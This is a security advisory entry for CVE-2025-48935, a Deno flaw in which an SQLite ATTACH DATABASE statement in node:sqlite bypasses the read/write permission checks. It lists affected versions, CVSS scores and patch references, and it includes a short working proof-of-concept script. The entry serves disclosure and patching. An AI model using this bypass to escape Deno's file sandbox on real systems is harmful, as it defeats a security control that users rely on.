CVE-2025-48935
CRITICAL9.1EPSS 0.35%Deno has --allow-read / --allow-write permission bypass in `node:sqlite`
Published: 6/4/2025Modified: 2/3/2026
Description
## Summary It is possible to bypass Deno's read/write permission checks by using `ATTACH DATABASE` statement. ## PoC ```js // poc.js import { DatabaseSync } from "node:sqlite" const db = new DatabaseSync(":memory:"); db.exec("ATTACH DATABASE 'test.db' as test;"); db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);"); ``` ``` $ deno poc.js ```
Affected packages (3)
- crates.io/deno>= 2.2.0, < 2.2.5
- crates.io/deno>= 2.2.0, < 2.2.5
- crates.io/deno_node>= 0.129.0, < 0.134.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
| osv | CVSS 3.1 | CRITICAL9.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
References (6)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-48935
- PATCHhttps://crates.io/crates/deno
- PATCHhttps://github.com/denoland/deno
- WEBhttps://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860
- WEBhttps://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596
- WEBhttps://rustsec.org/advisories/RUSTSEC-2025-0138.html